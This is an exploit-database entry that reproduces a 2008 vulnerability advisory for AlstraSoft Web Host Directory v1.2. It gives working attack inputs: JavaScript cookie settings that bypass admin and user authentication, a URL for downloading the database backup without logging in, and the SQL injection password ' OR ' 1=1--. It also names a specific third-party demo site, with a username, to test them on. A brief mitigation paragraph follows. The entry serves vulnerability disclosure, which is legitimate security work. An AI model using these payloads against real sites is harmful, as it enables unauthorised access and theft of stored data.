header-logo
Suggest Exploit
vendor:
Web Host Directory
by:
G4N0K
7.5
CVSS
HIGH
Insecure Cookie Handling, Arbitrary Database Backup, SQLi Auth Bypass
20, 89, 79
CWE
Product Name: Web Host Directory
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:alstrasoft:web_host_directory:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities

admin Auth bypass, panel => http://localhost/[paht]/admin/; javascript:document.cookie = "adm=1"; users Auth bypass; javascript:document.cookie = "logged=[username]"; we can download a Backup of Database; http://localhost/[paht]/admin/backup/db; Username : [a_valid_username]; Password : ' OR ' 1=1--; http://www.hyperstop.com/demo/webhost/; username: testtest; password: ' OR ' 1=1--; javascript:document.cookie = "logged=testtest";

Mitigation:

Ensure that cookies are properly validated and sanitized before use, use parameterized queries to prevent SQL injection, and ensure that all user input is properly validated and sanitized.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ AlstraSoft Web Host Directory v1.2 ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://alstrasoft.com/webhost.htm ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 14.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ DTLZ ]===
	
	[0] Insecure Cookie Handling
				
		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
		[»] javascript:document.cookie = "adm=1";
		
		[!] users Auth bypass
		[»] javascript:document.cookie = "logged=[username]";
			javascript:document.cookie = "logged=g4n0k";
		
	
	
	[1] Arbitrary Database Backup
		
		[!] we can download a Backup of Database.
		[»]	http://localhost/[paht]/admin/backup/db
	

	
	[2] SQLi Auth Bypass
		
		[»] Username : [a_valid_username]
		[»]	Password : ' OR ' 1=1--
		

===[ LIVE ]===

	[»] http://www.hyperstop.com/demo/webhost/
		username: testtest
		password: ' OR ' 1=1--
		
		javascript:document.cookie = "logged=testtest";

		
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-14]